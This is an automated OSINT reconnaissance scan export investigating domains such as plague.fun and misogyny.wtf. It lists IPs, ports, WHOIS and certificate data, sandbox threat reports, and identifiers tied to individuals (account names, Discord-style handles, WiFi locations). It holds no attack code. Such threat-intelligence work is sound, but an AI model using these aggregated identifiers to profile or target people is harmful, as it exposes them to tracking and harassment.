Columns: Date Found | Type | Risky | Module | Children | Correlations | Distance | Starred | Annotation
Each record is followed by its Data Source and Data fields.

2022-12-18 00:12:06 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None
  Data Source: 104.21.28.240
  Data: Toronto, Ontario, ON, Canada, CA

2022-12-18 00:27:43 | Similar Domain | Yes | TLD Searcher | 1 | 0 | 1 | 0 | None
  Data Source: plague.fun
  Data: plague.sk

2022-12-18 00:05:39 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None
  Data Source: plague.fun
  Data: hook.plague.fun

2022-12-18 00:17:00 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None
  Data Source: http://webmail.zerotwo-best-waifu.online/js/vendor/bootstrap.min.js
  Data: application/javascript

2022-12-18 00:04:10 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None
  Data Source: 188.114.96.0
  Data (X.509 certificate, text fields):
    Version: 3 (0x2)
    Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf
    Signature Algorithm: ecdsa-with-SHA256
    Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
    Validity: Not Before: Aug 3 00:00:00 2022 GMT; Not After: Aug 2 23:59:59 2023 GMT
    Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
    Public Key Algorithm: id-ecPublicKey, Public-Key: (256 bit), NIST CURVE: P-256
    X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com
    X509v3 Key Usage: critical, Digital Signature
    X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication
    X509v3 CRL Distribution Points: http://crl3.digicert.com/CloudflareIncECCCA-3.crl, http://crl4.digicert.com/CloudflareIncECCCA-3.crl
    X509v3 Certificate Policies: Policy: 2.23.140.1.2.2, CPS: http://www.digicert.com/CPS
    Authority Information Access: OCSP - URI:http://ocsp.digicert.com; CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
    X509v3 Basic Constraints: critical, CA:FALSE
    CT Precertificate SCTs: 3 entries (Version v1, ecdsa-with-SHA256), Timestamps: Aug 3 19:12:00.178 2022 GMT, Aug 3 19:12:00.017 2022 GMT, Aug 3 19:12:00.038 2022 GMT

2022-12-18 00:06:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None
  Data Source: 188.114.96.0
  Data: 188.114.96.0:80

2022-12-18 00:06:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None
  Data Source: 104.21.19.243
  Data: 104.21.19.243:443

2022-12-18 00:21:54 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None
  Data Source: 104.21.7.179
  Data: {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77a94a634bb728f5-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]}

2022-12-18 00:05:16 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None
  Data Source: rasputain
  Data: fanpop (Category: social) https://www.fanpop.com/fans/rasputain

2022-12-18 00:16:59 | HTTP Headers | No | Web Spider | 0 | 0 | 4 | 0 | None
  Data Source: http://webmail.zerotwo-best-waifu.online/css/vendor/font-awesome-4.4.0/css/font-awesome.min.css
  Data: {"content-length": "26711", "accept-ranges": "bytes", "last-modified": "Fri, 12 Feb 2021 14:43:40 GMT", "connection": "keep-alive", "etag": "\"6026941c-6857\"", "date": "Sun, 18 Dec 2022 00:16:58 GMT", "x-frame-options": "SAMEORIGIN", "content-type": "text/css"}

2022-12-18 00:40:45 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None
  Data Source (WHOIS record, CIRA):
    Domain Name: misogyny.ca
    Registry Domain ID: 95142585-CIRA
    Registrar WHOIS Server: whois.ca.fury.ca
    Registrar URL: http://www.namespro.ca
    Updated Date: 2021-12-26T12:40:21Z
    Creation Date: 2021-07-07T19:00:05Z
    Registry Expiry Date: 2023-07-07T19:00:05Z
    Registrar: Namespro Solutions Inc.
    Registrar IANA ID: not applicable
    Registrar Abuse Contact Email: abuse@namespro.ca
    Registrar Abuse Contact Phone: +1.6046818007
    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
    Registrant, Admin, Tech and Billing contact fields: REDACTED FOR PRIVACY
    Name Server: slns1.namespro.ca
    Name Server: slns2.namespro.ca
    DNSSEC: unsigned
    >>> Last update of WHOIS database: 2022-12-18T00:40:43Z <<<
  Data: abuse@namespro.ca

2022-12-18 00:08:36 | Raw Data from RIRs | No | LeakIX | 0 | 0 | 1 | 0 | None
  Data Source: 137.117.157.128
  Data (LeakIX service record, event_source HttpPlugin, time 2022-10-19T13:55:05Z):
    ip: 137.117.157.128, port: 80, protocol: http, transport: tcp/http
    network: MICROSOFT-CORP-MSN-AS-BLOCK, ASN 8075, 137.116.0.0/15
    geoip: Amsterdam, North Holland, Netherlands (lat 52.3759, lon 4.8975)
    ssl: enabled False, detected False
    summary: X-Powered-By: Express; Content-Type: text/html; charset=utf-8; Content-Length: 27; ETag: W/"1b-In8yUEPhFNxKgEbXLblXjLte8/U"; Date: Wed, 19 Oct 2022 13:55:05 GMT; Connection: close; body: zeeckt.#0001 && Felpes#4003
    leak: dataset empty (files 0, rows 0, infected False); Leaks: None

2022-12-18 00:07:06 | Web Content | No | Web Spider | 2 | 0 | 2 | 0 | None
  Data Source: http://misogyny.wtf/grab/UsRjS959Rqm4sPG4
  Data:
    403 Forbidden

    Forbidden

    You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.

2022-12-18 00:06:42 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None
  Data Source: 172.67.190.129
  Data: 172.67.190.129:8080

2022-12-18 00:09:54 | Co-Hosted Site | No | HackerTarget | 0 | 0 | 2 | 0 | None
  Data Source: 172.67.147.230
  Data: brns.xyz

2022-12-18 00:11:56 | Physical Location | No | ipapi.co | 0 | 0 | 1 | 0 | None
  Data Source: 4.228.83.86
  Data: Campinas, Sao Paulo, SP, Brazil, BR

2022-12-18 00:09:34 | Co-Hosted Site | No | HackerTarget | 0 | 0 | 2 | 0 | None
  Data Source: 104.21.28.240
  Data: formivankie.tk

2022-12-18 00:03:16 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None
  Data Source: 90.116.166.102
  Data: lfbn-nic-1-332-102.w90-116.abo.wanadoo.fr

2022-12-18 00:18:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None
  Data Source: 188.114.97.0/24
  Data: 188.114.97.8:8443

2022-12-18 00:04:04 | Web Technology | No | Tool - WhatWeb | 0 | 0 | 1 | 0 | None
  Data Source: misogyny.wtf
  Data: Werkzeug

2022-12-18 00:18:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None
  Data Source: 188.114.97.0/24
  Data: 188.114.97.12:8080

2022-12-18 00:16:26 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None
  Data Source: 188.114.96.3
  Data: cdnjs.cloudflare.com

2022-12-18 00:12:31 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None
  Data Source: 188.114.97.3
  Data (Hybrid Analysis URL reports, submit_name https://188.114.97.3/):
    Report 1: environment_id 120 (Windows 7 64 bit), total_processes 3, threat_score 35, threat_level 1, verdict suspicious, vx_family "Malicious site", av_detect 0, total_network_connections 1, total_signatures 8
      hosts: 188.114.97.3; submission created_at 2022-12-08T18:23:49+00:00; job_id 63922bb48f5d337c6c22e89f; state SUCCESS
      sha256: edc48d9486432976c7bb048b0479c1555a4e484e1cf97587fa7a09b5dec4301b
      signatures: Drops files marked as clean (informative); Creates mutants (informative); Contacts server "188.114.97.3:443" (informative); Drops files inside appdata directory (informative); Dropped files, T1105 (informative); Found potential URL in binary/memory "https://188.114.97.3/" (informative); Found potential IP address in binary/memory (suspicious); Sample was identified as malicious by at least one Antivirus engine: "2/91 Antivirus vendors marked sample as malicious (2% detection rate)" (suspicious)
      mitre_attcks: T1105 Ingress Tool Transfer, tactic Command and Control, informative_identifiers_count 1
    Report 2: environment_id 160, total_processes 17, threat_score 35, same submit_name; signatures include Drops files marked as clean ("Part-RU", type "DOS executable (COM)"), Contacts server "188.114.97.3:443", Creates mutants (Chrome/WilError mutants). The export truncates this record mid-field.

2022-12-18 00:08:41 | Physical Location | No | LeakIX | 0 | 0 | 1 | 0 | None
  Data Source: 40.113.112.131
  Data: Amsterdam, North Holland, Netherlands

2022-12-18 00:31:03 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None
  Data Source (WHOIS records for plague.chat):
    Registry record (Identity Digital):
      Domain Name: plague.chat
      Registry Domain ID: 7664ba56bd064bbf82bc4fb158862a02-DONUTS
      Registrar WHOIS Server: whois.dynadot.com
      Registrar URL: http://dynadot.com
      Updated Date: 2022-12-08T01:32:43Z
      Creation Date: 2020-01-31T13:24:11Z
      Registry Expiry Date: 2023-01-31T13:24:11Z
      Registrar: Dynadot, LLC
      Registrar IANA ID: 472
      Registrar Abuse Contact Email: abuse@dynadot.com
      Registrar Abuse Contact Phone: +1.6502620100
      Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
      Registrant State/Province: California; Registrant Country: US; all other Registrant, Admin and Tech fields: REDACTED FOR PRIVACY
      Name Server: ns1.dyna-ns.net
      Name Server: ns2.dyna-ns.net
      DNSSEC: unsigned
      >>> Last update of WHOIS database: 2022-12-18T00:31:01Z <<<
    Registrar record (Dynadot):
      Domain Name: PLAGUE.CHAT
      Updated Date: 2022-01-03T14:24:39.0Z
      Creation Date: 2020-01-31T13:24:11.0Z
      Registrar Registration Expiration Date: 2023-01-31T13:24:11.0Z
      Registrar: DYNADOT LLC
      Registry Registrant ID / Admin ID / Tech ID: CPF-103775 (contact details REDACTED FOR PRIVACY)
      Registrant / Admin / Tech Email: https://www.dynadot.com/domain/contact-request?domain=plague.chat
      Name Server: ns1.dyna-ns.net
      Name Server: ns2.dyna-ns.net
      DNSSEC: unsigned
      >>> Last update of WHOIS database: 2022-01-03 06:24:39 -0800 <<<
  Data: abuse@dynadot.com

2022-12-18 00:25:13 | Malicious IP Address | Yes | MetaDefender | 0 | 0 | 1 | 0 | None
  Data Source: 20.224.2.213
  Data: webroot.com [20.224.2.213]

2022-12-18 00:04:49 | Similar Domain | Yes | TLD Searcher | 1 | 0 | 1 | 0 | None
  Data Source: plague.fun
  Data: plague.biz

2022-12-18 00:24:07 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None
  Data Source (WHOIS record, VeriSign .NET registry):
    Domain Name: PLAGUE.NET
    Registry Domain ID: 33118110_DOMAIN_NET-VRSN
    Registrar WHOIS Server: whois.PublicDomainRegistry.com
    Registrar URL: http://www.publicdomainregistry.com
    Updated Date: 2022-09-03T19:07:29Z
    Creation Date: 2000-08-17T10:30:29Z
    Registry Expiry Date: 2023-08-17T10:30:29Z
    Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
    Registrar IANA ID: 303
    Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
    Registrar Abuse Contact Phone: +1.2013775952
    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
    Name Server: BIZ.THOROFARE.INFO
    Name Server: INFO.THOROFARE.BIZ
    DNSSEC: unsigned
    >>> Last update of whois database: 2022-12-18T00:23:45Z <<<
  Data: abuse-contact@publicdomainregistry.com
Domain Name: PLAGUE.NET Registry Domain ID: 33118110_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.publicdomainregistry.com Registrar URL: www.publicdomainregistry.com Updated Date: 2022-09-03T19:07:30Z Creation Date: 2000-08-17T10:30:29Z Registrar Registration Expiration Date: 2023-08-17T10:30:29Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: GDPR Masked Registrant Name: GDPR Masked Registrant Organization: GDPR Masked Registrant Street: GDPR Masked Registrant City: GDPR Masked Registrant State/Province: London Registrant Postal Code: GDPR Masked Registrant Country: GB Registrant Phone: GDPR Masked Registrant Phone Ext: Registrant Fax: GDPR Masked Registrant Fax Ext: Registrant Email: gdpr-masking@gdpr-masked.com Registry Admin ID: GDPR Masked Admin Name: GDPR Masked Admin Organization: GDPR Masked Admin Street: GDPR Masked Admin City: GDPR Masked Admin State/Province: GDPR Masked Admin Postal Code: GDPR Masked Admin Country: GDPR Masked Admin Phone: GDPR Masked Admin Phone Ext: Admin Fax: GDPR Masked Admin Fax Ext: Admin Email: gdpr-masking@gdpr-masked.com Registry Tech ID: GDPR Masked Tech Name: GDPR Masked Tech Organization: GDPR Masked Tech Street: GDPR Masked Tech City: GDPR Masked Tech State/Province: GDPR Masked Tech Postal Code: GDPR Masked Tech Country: GDPR Masked Tech Phone: GDPR Masked Tech Phone Ext: Tech Fax: GDPR Masked Tech Fax Ext: Tech Email: gdpr-masking@gdpr-masked.com Name Server: biz.thorofare.info Name Server: info.thorofare.biz DNSSEC: Unsigned Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com Registrar Abuse Contact Phone: +1.2013775952 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:24:02Z <<< For more information on Whois status codes, please visit https://icann.org/epp Registration Service Provided 
By: The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is", and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. The Registrar of record is PDR Ltd. d/b/a PublicDomainRegistry.com. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. 
2022-12-18 00:04:30 Affiliate - Internet Name No DNS Raw Records 1 0 1 0 None ns1.amenworld.com zerotwo-best-waifu.online 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None denis (Net ID: 00:01:46:02:C4:4C) 37.780462,-122.390564 2022-12-18 00:25:41 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None lfbn-nic-1-313-189.w90-116.abo.wanadoo.fr 90.116.149.189 2022-12-18 00:22:28 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.128:443 188.114.97.0/24 2022-12-18 00:09:38 Co-Hosted Site No HackerTarget 0 0 2 0 None 1sygo.com.cdn.cloudflare.net 172.67.147.230 2022-12-18 00:32:59 Malicious Affiliate IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [81.88.52.225] https://www.virustotal.com/en/ip-address/81.88.52.225/information/ 81.88.52.225 2022-12-18 00:21:02 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77af8d20cabc9b1f-FRA Content-Encoding: gzip 104.21.28.240 2022-12-18 00:04:04 Raw Data from RIRs No Tool - WhatWeb 0 0 1 0 None [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://rasputain.fr', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://rasputain.fr/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.67.169.215']}}}, {}] rasputain.fr 2022-12-18 00:13:35 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None noc@cloudflare.com {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'neutral', u'asn_country_code': u'US', u'is_open_proxy': False, 
u'creation_time': u'2021-03-04 12:44:22', u'asn_date': u'2015-02-25 00:00:00', u'tag': [u'phishing'], u'postal_code': u'20500', u'is_mining_pool': False, u'ip_addr': u'172.67.190.129', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'Washington', u'last_updated': u'2017-02-17 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 38.9071923, u'lon': -77.0368707}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'description': u'Phishing', u'labels': [u'compromised'], u'source': u'Maltiverse', u'first_seen': u'2021-03-04 12:44:22', u'last_seen': u'2021-03-04 12:44:22'}], u'modification_time': u'2021-03-04 12:44:22', u'asn_cidr': u'172.67.176.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': False, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None charmingsinfulbusinesses.distingindouser.repl.co 34.149.204.188 2022-12-18 00:09:43 Co-Hosted Site No HackerTarget 0 0 2 0 None alejandrocastillero.com.pa 172.67.147.230 2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.169.215 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 
None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b0cd833b792c30-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.1 2022-12-18 00:25:19 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [104.21.28.240] 104.21.28.240 2022-12-18 00:34:23 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.dynv6.net plague.fun 2022-12-18 00:03:05 IPv6 Address No DNS Resolver 2 0 1 0 None 2606:4700:3035::6815:1bf2 rasputain.fr 2022-12-18 00:13:56 HTTP Status Code No Web Spider 0 0 2 0 None None http://wasp.plague.fun 2022-12-18 00:06:31 Company Name No Company Name Extractor 0 0 2 0 None ENOM, INC. Domain Name: ZEROTWO-BEST-WAIFU.ONLINE Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-01-11T15:03:40.0Z Creation Date: 2021-12-25T22:42:25.0Z Registry Expiry Date: 2022-12-25T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. 
Domain Name: zerotwo-best-waifu.online Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-01-11T15:03:40.00Z Creation Date: 2021-12-25T22:42:00.00Z Registrar Registration Expiration Date: 2022-12-25T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: ok https://www.icann.org/epp#ok Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Paris Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/0b66922f-87a6-44e9-a979-1158d3dacd13 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTP://WDPRS.INTERNIC.NET/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.00Z <<< For more information on Whois status codes, please visit 
https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None fse2 (Net ID: 00:01:38:A0:A1:09) 37.780462,-122.390564 2022-12-18 00:15:47 Non-Standard HTTP Header No Strange Header Identifier 0 0 3 0 None keep-alive: timeout=5 {"content-length": "1078", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Thu, 03 Nov 2022 03:05:34 GMT", "connection": "keep-alive", "etag": "W/\"436-1843b737830\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:17 GMT", "access-control-allow-origin": "*", "content-type": "text/html; charset=UTF-8"} 2022-12-18 00:24:56 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.176 90.116.149.183 2022-12-18 00:03:09 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.226 81.88.52.232 2022-12-18 00:03:03 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.105 90.116.166.104 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 
0 None #LG@Vo1P*Service& (Net ID: 00:01:36:57:A4:17) 37.780462,-122.390564 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.137.37 2022-12-18 00:13:38 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None info@indiantypefoundry.com
2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b1ee0fdd422c1d-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.28.240 2022-12-18 00:04:47 Raw Data from RIRs No Maltiverse 3 0 2 0 None {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'whitelist', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2022-06-23 00:42:25', u'asn_date': u'2015-02-25 00:00:00', u'tag':
[u'phishing'], u'postal_code': u'94107', u'is_mining_pool': False, u'ip_addr': u'172.67.137.37', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'San Francisco', u'last_updated': u'2021-05-26 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 37.751, u'lon': -97.822}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'description': u'Phishing', u'labels': [u'compromised'], u'source': u'OpenPhish', u'first_seen': u'2022-06-23 00:42:25', u'last_seen': u'2022-06-24 12:40:18'}], u'modification_time': u'2022-10-03 13:47:50', u'asn_cidr': u'172.67.128.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': True, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 172.67.137.37 2022-12-18 00:20:36 Raw Data from RIRs No Censys 0 0 1 0 None {"last_updated_at": "2022-11-17T13:21:29.012Z", "ip": "137.117.157.128", "location_updated_at": "2022-12-18T00:20:33.438254Z", 